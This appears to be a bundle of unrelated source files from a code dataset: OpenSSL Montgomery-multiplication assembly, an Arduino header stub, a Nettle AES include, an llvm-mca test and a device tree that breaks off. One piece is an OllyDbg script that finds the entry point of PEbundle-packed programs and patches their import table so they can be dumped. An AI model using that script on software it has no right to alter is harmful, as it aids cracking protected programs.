movq (%rcx),%rax
imulq %r10,%rbp
movq %rdx,%r11
mulq %rbp
addq %rax,%r10
movq 8(%rsi),%rax
adcq $0,%rdx
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq 8(%rcx),%rax
adcq $0,%rdx
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq 16(%rsi),%rax
adcq $0,%rdx
addq %r11,%rdi
leaq 4(%r15),%r15
adcq $0,%rdx
movq %rdi,(%rsp)
movq %rdx,%r13
jmp .L1st4x
.align 16
.L1st4x:
mulq %rbx
addq %rax,%r10
movq -16(%rcx,%r15,8),%rax
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq -8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-24(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq -8(%rcx,%r15,8),%rax
adcq $0,%rdx
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq (%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-16(%rsp,%r15,8)
movq %rdx,%r13
mulq %rbx
addq %rax,%r10
movq (%rcx,%r15,8),%rax
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq 8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-8(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq 8(%rcx,%r15,8),%rax
adcq $0,%rdx
leaq 4(%r15),%r15
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq -16(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-32(%rsp,%r15,8)
movq %rdx,%r13
cmpq %r9,%r15
jb .L1st4x
mulq %rbx
addq %rax,%r10
movq -16(%rcx,%r15,8),%rax
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq -8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-24(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq -8(%rcx,%r15,8),%rax
adcq $0,%rdx
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq (%rsi),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-16(%rsp,%r15,8)
movq %rdx,%r13
xorq %rdi,%rdi
addq %r10,%r13
adcq $0,%rdi
movq %r13,-8(%rsp,%r15,8)
movq %rdi,(%rsp,%r15,8)
leaq 1(%r14),%r14
.align 4
.Louter4x:
movq (%r12,%r14,8),%rbx
xorq %r15,%r15
movq (%rsp),%r10
movq %r8,%rbp
mulq %rbx
addq %rax,%r10
movq (%rcx),%rax
adcq $0,%rdx
imulq %r10,%rbp
movq %rdx,%r11
mulq %rbp
addq %rax,%r10
movq 8(%rsi),%rax
adcq $0,%rdx
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq 8(%rcx),%rax
adcq $0,%rdx
addq 8(%rsp),%r11
adcq $0,%rdx
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq 16(%rsi),%rax
adcq $0,%rdx
addq %r11,%rdi
leaq 4(%r15),%r15
adcq $0,%rdx
movq %rdi,(%rsp)
movq %rdx,%r13
jmp .Linner4x
.align 16
.Linner4x:
mulq %rbx
addq %rax,%r10
movq -16(%rcx,%r15,8),%rax
adcq $0,%rdx
addq -16(%rsp,%r15,8),%r10
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq -8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-24(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq -8(%rcx,%r15,8),%rax
adcq $0,%rdx
addq -8(%rsp,%r15,8),%r11
adcq $0,%rdx
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq (%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-16(%rsp,%r15,8)
movq %rdx,%r13
mulq %rbx
addq %rax,%r10
movq (%rcx,%r15,8),%rax
adcq $0,%rdx
addq (%rsp,%r15,8),%r10
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq 8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-8(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq 8(%rcx,%r15,8),%rax
adcq $0,%rdx
addq 8(%rsp,%r15,8),%r11
adcq $0,%rdx
leaq 4(%r15),%r15
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq -16(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-32(%rsp,%r15,8)
movq %rdx,%r13
cmpq %r9,%r15
jb .Linner4x
mulq %rbx
addq %rax,%r10
movq -16(%rcx,%r15,8),%rax
adcq $0,%rdx
addq -16(%rsp,%r15,8),%r10
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq -8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-24(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq -8(%rcx,%r15,8),%rax
adcq $0,%rdx
addq -8(%rsp,%r15,8),%r11
adcq $0,%rdx
leaq 1(%r14),%r14
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq (%rsi),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-16(%rsp,%r15,8)
movq %rdx,%r13
xorq %rdi,%rdi
addq %r10,%r13
adcq $0,%rdi
addq (%rsp,%r9,8),%r13
adcq $0,%rdi
movq %r13,-8(%rsp,%r15,8)
movq %rdi,(%rsp,%r15,8)
cmpq %r9,%r14
jb .Louter4x
movq 16(%rsp,%r9,8),%rdi
movq 0(%rsp),%rax
pxor %xmm0,%xmm0
movq 8(%rsp),%rdx
shrq $2,%r9
leaq (%rsp),%rsi
xorq %r14,%r14
subq 0(%rcx),%rax
movq 16(%rsi),%rbx
movq 24(%rsi),%rbp
sbbq 8(%rcx),%rdx
leaq -1(%r9),%r15
jmp .Lsub4x
.align 16
.Lsub4x:
movq %rax,0(%rdi,%r14,8)
movq %rdx,8(%rdi,%r14,8)
sbbq 16(%rcx,%r14,8),%rbx
movq 32(%rsi,%r14,8),%rax
movq 40(%rsi,%r14,8),%rdx
sbbq 24(%rcx,%r14,8),%rbp
movq %rbx,16(%rdi,%r14,8)
movq %rbp,24(%rdi,%r14,8)
sbbq 32(%rcx,%r14,8),%rax
movq 48(%rsi,%r14,8),%rbx
movq 56(%rsi,%r14,8),%rbp
sbbq 40(%rcx,%r14,8),%rdx
leaq 4(%r14),%r14
decq %r15
jnz .Lsub4x
movq %rax,0(%rdi,%r14,8)
movq 32(%rsi,%r14,8),%rax
sbbq 16(%rcx,%r14,8),%rbx
movq %rdx,8(%rdi,%r14,8)
sbbq 24(%rcx,%r14,8),%rbp
movq %rbx,16(%rdi,%r14,8)
sbbq $0,%rax
movq %rbp,24(%rdi,%r14,8)
xorq %r14,%r14
andq %rax,%rsi
notq %rax
movq %rdi,%rcx
andq %rax,%rcx
leaq -1(%r9),%r15
orq %rcx,%rsi
movdqu (%rsi),%xmm1
movdqa %xmm0,(%rsp)
movdqu %xmm1,(%rdi)
jmp .Lcopy4x
.align 16
.Lcopy4x:
movdqu 16(%rsi,%r14,1),%xmm2
movdqu 32(%rsi,%r14,1),%xmm1
movdqa %xmm0,16(%rsp,%r14,1)
movdqu %xmm2,16(%rdi,%r14,1)
movdqa %xmm0,32(%rsp,%r14,1)
movdqu %xmm1,32(%rdi,%r14,1)
leaq 32(%r14),%r14
decq %r15
jnz .Lcopy4x
shlq $2,%r9
movdqu 16(%rsi,%r14,1),%xmm2
movdqa %xmm0,16(%rsp,%r14,1)
movdqu %xmm2,16(%rdi,%r14,1)
movq 8(%rsp,%r9,8),%rsi
movq $1,%rax
movq (%rsi),%r15
movq 8(%rsi),%r14
movq 16(%rsi),%r13
movq 24(%rsi),%r12
movq 32(%rsi),%rbp
movq 40(%rsi),%rbx
leaq 48(%rsi),%rsp
.Lmul4x_epilogue:
.byte 0xf3,0xc3
.size bn_mul4x_mont,.-bn_mul4x_mont
.type bn_sqr8x_mont,@function
.align 32
bn_sqr8x_mont:
.Lsqr8x_enter:
movq %rsp,%rax
pushq %rbx
pushq %rbp
pushq %r12
pushq %r13
pushq %r14
pushq %r15
movl %r9d,%r10d
shll $3,%r9d
shlq $3+2,%r10
negq %r9
leaq -64(%rsp,%r9,4),%r11
movq (%r8),%r8
subq %rsi,%r11
andq $4095,%r11
cmpq %r11,%r10
jb .Lsqr8x_sp_alt
subq %r11,%rsp
leaq -64(%rsp,%r9,4),%rsp
jmp .Lsqr8x_sp_done
.align 32
.Lsqr8x_sp_alt:
leaq 4096-64(,%r9,4),%r10
leaq -64(%rsp,%r9,4),%rsp
subq %r10,%r11
movq $0,%r10
cmovcq %r10,%r11
subq %r11,%rsp
.Lsqr8x_sp_done:
andq $-64,%rsp
movq %r9,%r10
negq %r9
leaq 64(%rsp,%r9,2),%r11
movq %r8,32(%rsp)
movq %rax,40(%rsp)
.Lsqr8x_body:
movq %r9,%rbp
.byte 102,73,15,110,211
shrq $3+2,%rbp
movl OPENSSL_ia32cap_P+8(%rip),%eax
jmp .Lsqr8x_copy_n
.align 32
.Lsqr8x_copy_n:
movq 0(%rcx),%xmm0
movq 8(%rcx),%xmm1
movq 16(%rcx),%xmm3
movq 24(%rcx),%xmm4
leaq 32(%rcx),%rcx
movdqa %xmm0,0(%r11)
movdqa %xmm1,16(%r11)
movdqa %xmm3,32(%r11)
movdqa %xmm4,48(%r11)
leaq 64(%r11),%r11
decq %rbp
jnz .Lsqr8x_copy_n
pxor %xmm0,%xmm0
.byte 102,72,15,110,207
.byte 102,73,15,110,218
call bn_sqr8x_internal
pxor %xmm0,%xmm0
leaq 48(%rsp),%rax
leaq 64(%rsp,%r9,2),%rdx
shrq $3+2,%r9
movq 40(%rsp),%rsi
jmp .Lsqr8x_zero
.align 32
.Lsqr8x_zero:
movdqa %xmm0,0(%rax)
movdqa %xmm0,16(%rax)
movdqa %xmm0,32(%rax)
movdqa %xmm0,48(%rax)
leaq 64(%rax),%rax
movdqa %xmm0,0(%rdx)
movdqa %xmm0,16(%rdx)
movdqa %xmm0,32(%rdx)
movdqa %xmm0,48(%rdx)
leaq 64(%rdx),%rdx
decq %r9
jnz .Lsqr8x_zero
movq $1,%rax
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbp
movq -8(%rsi),%rbx
leaq (%rsi),%rsp
.Lsqr8x_epilogue:
.byte 0xf3,0xc3
.size bn_sqr8x_mont,.-bn_sqr8x_mont
.byte 77,111,110,116,103,111,109,101,114,121,32,77,117,108,116,105,112,108,105,99,97,116,105,111,110,32,102,111,114,32,120,56,54,95,54,52,44,32,67,82,89,80,84,79,71,65,77,83,32,98,121,32,60,97,112,112,114,111,64,111,112,101,110,115,115,108,46,111,114,103,62,0
.align 16
| {
"language": "Assembly"
} |
/*
Copyright (c) 2016 Arduino LLC. All right reserved.
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
// including Client.h is deprecated, for all future projects use Arduino.h instead
// This include is added for compatibility, it will be remove on the next
// major release of the API
#include "../Client.h"
| {
"language": "Assembly"
} |
// PEbundle V2.3 oep finder+patch IAT //壳超过两层以上就不准了
// by Mr.David
// www.chinadfcg.com
var addr2
findop eip,#60# //特征指令
mov addr2,$RESULT
bp addr2
run
BC addr2
sto
mov addr2,esp
bphws addr2,"r"
var addr1
gpa "GetModuleHandleA","kernel32.dll"
mov addr1,$RESULT //捷径 API断点GetModuleHandleA
bp addr1
run
bc addr1 //Clear break point //取消断点
rtu //Alt+F9
findop eip,#85C0# //特征指令
mov addr1,$RESULT
bp addr1
run
BC addr1
findop eip,#85C0# //特征指令
mov addr1,$RESULT
bp addr1
run
BC addr1
repl eip, #85C0#, #33C0#, 2 //修复IAT
run
bphwc addr2
sto
sto
sto
cmt eip,"OEP1 Or Next Shell To Get,Please dumped it,Enjoy!"
| {
"language": "Assembly"
} |
C arm/fat/aes-encrypt-internal-2.asm
ifelse(<
Copyright (C) 2015 Niels Möller
This file is part of GNU Nettle.
GNU Nettle is free software: you can redistribute it and/or
modify it under the terms of either:
* the GNU Lesser General Public License as published by the Free
Software Foundation; either version 3 of the License, or (at your
option) any later version.
or
* the GNU General Public License as published by the Free
Software Foundation; either version 2 of the License, or (at your
option) any later version.
or both in parallel, as here.
GNU Nettle is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received copies of the GNU General Public License and
the GNU Lesser General Public License along with this program. If
not, see http://www.gnu.org/licenses/.
>)
define(<fat_transform>, <$1_armv6>)
include_src(<arm/v6/aes-encrypt-internal.asm>)
| {
"language": "Assembly"
} |
# NOTE: Assertions have been autogenerated by utils/update_mca_test_checks.py
# RUN: llvm-mca -mtriple=x86_64-unknown-unknown -mcpu=atom -instruction-tables < %s | FileCheck %s
pabsb %mm0, %mm2
pabsb (%rax), %mm2
pabsb %xmm0, %xmm2
pabsb (%rax), %xmm2
pabsd %mm0, %mm2
pabsd (%rax), %mm2
pabsd %xmm0, %xmm2
pabsd (%rax), %xmm2
pabsw %mm0, %mm2
pabsw (%rax), %mm2
pabsw %xmm0, %xmm2
pabsw (%rax), %xmm2
palignr $1, %mm0, %mm2
palignr $1, (%rax), %mm2
palignr $1, %xmm0, %xmm2
palignr $1, (%rax), %xmm2
phaddd %mm0, %mm2
phaddd (%rax), %mm2
phaddd %xmm0, %xmm2
phaddd (%rax), %xmm2
phaddsw %mm0, %mm2
phaddsw (%rax), %mm2
phaddsw %xmm0, %xmm2
phaddsw (%rax), %xmm2
phaddw %mm0, %mm2
phaddw (%rax), %mm2
phaddw %xmm0, %xmm2
phaddw (%rax), %xmm2
phsubd %mm0, %mm2
phsubd (%rax), %mm2
phsubd %xmm0, %xmm2
phsubd (%rax), %xmm2
phsubsw %mm0, %mm2
phsubsw (%rax), %mm2
phsubsw %xmm0, %xmm2
phsubsw (%rax), %xmm2
phsubw %mm0, %mm2
phsubw (%rax), %mm2
phsubw %xmm0, %xmm2
phsubw (%rax), %xmm2
pmaddubsw %mm0, %mm2
pmaddubsw (%rax), %mm2
pmaddubsw %xmm0, %xmm2
pmaddubsw (%rax), %xmm2
pmulhrsw %mm0, %mm2
pmulhrsw (%rax), %mm2
pmulhrsw %xmm0, %xmm2
pmulhrsw (%rax), %xmm2
pshufb %mm0, %mm2
pshufb (%rax), %mm2
pshufb %xmm0, %xmm2
pshufb (%rax), %xmm2
psignb %mm0, %mm2
psignb (%rax), %mm2
psignb %xmm0, %xmm2
psignb (%rax), %xmm2
psignd %mm0, %mm2
psignd (%rax), %mm2
psignd %xmm0, %xmm2
psignd (%rax), %xmm2
psignw %mm0, %mm2
psignw (%rax), %mm2
psignw %xmm0, %xmm2
psignw (%rax), %xmm2
# CHECK: Instruction Info:
# CHECK-NEXT: [1]: #uOps
# CHECK-NEXT: [2]: Latency
# CHECK-NEXT: [3]: RThroughput
# CHECK-NEXT: [4]: MayLoad
# CHECK-NEXT: [5]: MayStore
# CHECK-NEXT: [6]: HasSideEffects (U)
# CHECK: [1] [2] [3] [4] [5] [6] Instructions:
# CHECK-NEXT: 1 1 0.50 pabsb %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * pabsb (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 pabsb %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * pabsb (%rax), %xmm2
# CHECK-NEXT: 1 1 0.50 pabsd %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * pabsd (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 pabsd %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * pabsd (%rax), %xmm2
# CHECK-NEXT: 1 1 0.50 pabsw %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * pabsw (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 pabsw %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * pabsw (%rax), %xmm2
# CHECK-NEXT: 1 1 1.00 palignr $1, %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * palignr $1, (%rax), %mm2
# CHECK-NEXT: 1 1 1.00 palignr $1, %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * palignr $1, (%rax), %xmm2
# CHECK-NEXT: 1 3 1.50 phaddd %mm0, %mm2
# CHECK-NEXT: 1 4 2.00 * phaddd (%rax), %mm2
# CHECK-NEXT: 1 3 1.50 phaddd %xmm0, %xmm2
# CHECK-NEXT: 1 4 2.00 * phaddd (%rax), %xmm2
# CHECK-NEXT: 1 5 2.50 phaddsw %mm0, %mm2
# CHECK-NEXT: 1 6 3.00 * phaddsw (%rax), %mm2
# CHECK-NEXT: 1 7 3.50 phaddsw %xmm0, %xmm2
# CHECK-NEXT: 1 8 4.00 * phaddsw (%rax), %xmm2
# CHECK-NEXT: 1 5 2.50 phaddw %mm0, %mm2
# CHECK-NEXT: 1 6 3.00 * phaddw (%rax), %mm2
# CHECK-NEXT: 1 7 3.50 phaddw %xmm0, %xmm2
# CHECK-NEXT: 1 8 4.00 * phaddw (%rax), %xmm2
# CHECK-NEXT: 1 3 1.50 phsubd %mm0, %mm2
# CHECK-NEXT: 1 4 2.00 * phsubd (%rax), %mm2
# CHECK-NEXT: 1 3 1.50 phsubd %xmm0, %xmm2
# CHECK-NEXT: 1 4 2.00 * phsubd (%rax), %xmm2
# CHECK-NEXT: 1 5 2.50 phsubsw %mm0, %mm2
# CHECK-NEXT: 1 6 3.00 * phsubsw (%rax), %mm2
# CHECK-NEXT: 1 7 3.50 phsubsw %xmm0, %xmm2
# CHECK-NEXT: 1 8 4.00 * phsubsw (%rax), %xmm2
# CHECK-NEXT: 1 5 2.50 phsubw %mm0, %mm2
# CHECK-NEXT: 1 6 3.00 * phsubw (%rax), %mm2
# CHECK-NEXT: 1 7 3.50 phsubw %xmm0, %xmm2
# CHECK-NEXT: 1 8 4.00 * phsubw (%rax), %xmm2
# CHECK-NEXT: 1 4 4.00 pmaddubsw %mm0, %mm2
# CHECK-NEXT: 1 4 4.00 * pmaddubsw (%rax), %mm2
# CHECK-NEXT: 1 5 5.00 pmaddubsw %xmm0, %xmm2
# CHECK-NEXT: 1 5 5.00 * pmaddubsw (%rax), %xmm2
# CHECK-NEXT: 1 4 4.00 pmulhrsw %mm0, %mm2
# CHECK-NEXT: 1 4 4.00 * pmulhrsw (%rax), %mm2
# CHECK-NEXT: 1 5 5.00 pmulhrsw %xmm0, %xmm2
# CHECK-NEXT: 1 5 5.00 * pmulhrsw (%rax), %xmm2
# CHECK-NEXT: 1 1 1.00 pshufb %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * pshufb (%rax), %mm2
# CHECK-NEXT: 1 4 2.00 pshufb %xmm0, %xmm2
# CHECK-NEXT: 1 5 2.50 * pshufb (%rax), %xmm2
# CHECK-NEXT: 1 1 0.50 psignb %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * psignb (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 psignb %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * psignb (%rax), %xmm2
# CHECK-NEXT: 1 1 0.50 psignd %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * psignd (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 psignd %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * psignd (%rax), %xmm2
# CHECK-NEXT: 1 1 0.50 psignw %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * psignw (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 psignw %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * psignw (%rax), %xmm2
# CHECK: Resources:
# CHECK-NEXT: [0] - AtomPort0
# CHECK-NEXT: [1] - AtomPort1
# CHECK: Resource pressure per iteration:
# CHECK-NEXT: [0] [1]
# CHECK-NEXT: 130.50 76.50
# CHECK: Resource pressure by instruction:
# CHECK-NEXT: [0] [1] Instructions:
# CHECK-NEXT: 0.50 0.50 pabsb %mm0, %mm2
# CHECK-NEXT: 1.00 - pabsb (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 pabsb %xmm0, %xmm2
# CHECK-NEXT: 1.00 - pabsb (%rax), %xmm2
# CHECK-NEXT: 0.50 0.50 pabsd %mm0, %mm2
# CHECK-NEXT: 1.00 - pabsd (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 pabsd %xmm0, %xmm2
# CHECK-NEXT: 1.00 - pabsd (%rax), %xmm2
# CHECK-NEXT: 0.50 0.50 pabsw %mm0, %mm2
# CHECK-NEXT: 1.00 - pabsw (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 pabsw %xmm0, %xmm2
# CHECK-NEXT: 1.00 - pabsw (%rax), %xmm2
# CHECK-NEXT: 1.00 - palignr $1, %mm0, %mm2
# CHECK-NEXT: 1.00 - palignr $1, (%rax), %mm2
# CHECK-NEXT: 1.00 - palignr $1, %xmm0, %xmm2
# CHECK-NEXT: 1.00 - palignr $1, (%rax), %xmm2
# CHECK-NEXT: 1.50 1.50 phaddd %mm0, %mm2
# CHECK-NEXT: 2.00 2.00 phaddd (%rax), %mm2
# CHECK-NEXT: 1.50 1.50 phaddd %xmm0, %xmm2
# CHECK-NEXT: 2.00 2.00 phaddd (%rax), %xmm2
# CHECK-NEXT: 2.50 2.50 phaddsw %mm0, %mm2
# CHECK-NEXT: 3.00 3.00 phaddsw (%rax), %mm2
# CHECK-NEXT: 3.50 3.50 phaddsw %xmm0, %xmm2
# CHECK-NEXT: 4.00 4.00 phaddsw (%rax), %xmm2
# CHECK-NEXT: 2.50 2.50 phaddw %mm0, %mm2
# CHECK-NEXT: 3.00 3.00 phaddw (%rax), %mm2
# CHECK-NEXT: 3.50 3.50 phaddw %xmm0, %xmm2
# CHECK-NEXT: 4.00 4.00 phaddw (%rax), %xmm2
# CHECK-NEXT: 1.50 1.50 phsubd %mm0, %mm2
# CHECK-NEXT: 2.00 2.00 phsubd (%rax), %mm2
# CHECK-NEXT: 1.50 1.50 phsubd %xmm0, %xmm2
# CHECK-NEXT: 2.00 2.00 phsubd (%rax), %xmm2
# CHECK-NEXT: 2.50 2.50 phsubsw %mm0, %mm2
# CHECK-NEXT: 3.00 3.00 phsubsw (%rax), %mm2
# CHECK-NEXT: 3.50 3.50 phsubsw %xmm0, %xmm2
# CHECK-NEXT: 4.00 4.00 phsubsw (%rax), %xmm2
# CHECK-NEXT: 2.50 2.50 phsubw %mm0, %mm2
# CHECK-NEXT: 3.00 3.00 phsubw (%rax), %mm2
# CHECK-NEXT: 3.50 3.50 phsubw %xmm0, %xmm2
# CHECK-NEXT: 4.00 4.00 phsubw (%rax), %xmm2
# CHECK-NEXT: 4.00 - pmaddubsw %mm0, %mm2
# CHECK-NEXT: 4.00 - pmaddubsw (%rax), %mm2
# CHECK-NEXT: 5.00 - pmaddubsw %xmm0, %xmm2
# CHECK-NEXT: 5.00 - pmaddubsw (%rax), %xmm2
# CHECK-NEXT: 4.00 - pmulhrsw %mm0, %mm2
# CHECK-NEXT: 4.00 - pmulhrsw (%rax), %mm2
# CHECK-NEXT: 5.00 - pmulhrsw %xmm0, %xmm2
# CHECK-NEXT: 5.00 - pmulhrsw (%rax), %xmm2
# CHECK-NEXT: 1.00 - pshufb %mm0, %mm2
# CHECK-NEXT: 1.00 - pshufb (%rax), %mm2
# CHECK-NEXT: 2.00 2.00 pshufb %xmm0, %xmm2
# CHECK-NEXT: 2.50 2.50 pshufb (%rax), %xmm2
# CHECK-NEXT: 0.50 0.50 psignb %mm0, %mm2
# CHECK-NEXT: 1.00 - psignb (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 psignb %xmm0, %xmm2
# CHECK-NEXT: 1.00 - psignb (%rax), %xmm2
# CHECK-NEXT: 0.50 0.50 psignd %mm0, %mm2
# CHECK-NEXT: 1.00 - psignd (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 psignd %xmm0, %xmm2
# CHECK-NEXT: 1.00 - psignd (%rax), %xmm2
# CHECK-NEXT: 0.50 0.50 psignw %mm0, %mm2
# CHECK-NEXT: 1.00 - psignw (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 psignw %xmm0, %xmm2
# CHECK-NEXT: 1.00 - psignw (%rax), %xmm2
| {
"language": "Assembly"
} |
/** @file
* Copyright (c) 2017 - 2018, Linaro Limited. All rights reserved.
*
* SPDX-License-Identifier: BSD-2-Clause-Patent
*/
#define GIC_SPI 0
#define GIC_PPI 1
#define IRQ_TYPE_NONE 0
#define IRQ_TYPE_EDGE_RISING 1
#define IRQ_TYPE_EDGE_FALLING 2
#define IRQ_TYPE_EDGE_BOTH (IRQ_TYPE_EDGE_FALLING | IRQ_TYPE_EDGE_RISING)
#define IRQ_TYPE_LEVEL_HIGH 4
#define IRQ_TYPE_LEVEL_LOW 8
#define GPIO_ACTIVE_HIGH 0
#define GPIO_ACTIVE_LOW 1
/ {
#address-cells = <2>;
#size-cells = <2>;
interrupt-parent = <&gic>;
aliases {
serial0 = &soc_uart0;
serial1 = &fuart;
};
chosen {
stdout-path = "serial0:115200n8";
};
cpus {
#address-cells = <1>;
#size-cells = <0>;
CPU0: cpu@0 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x0>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU1: cpu@1 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x1>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU2: cpu@100 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x100>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU3: cpu@101 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x101>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU4: cpu@200 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x200>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU5: cpu@201 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x201>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU6: cpu@300 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x300>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU7: cpu@301 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x301>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU8: cpu@400 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x400>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU9: cpu@401 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x401>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU10: cpu@500 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x500>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU11: cpu@501 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x501>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU12: cpu@600 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x600>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU13: cpu@601 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x601>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU14: cpu@700 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x700>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU15: cpu@701 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x701>;
enable-method = "psci";
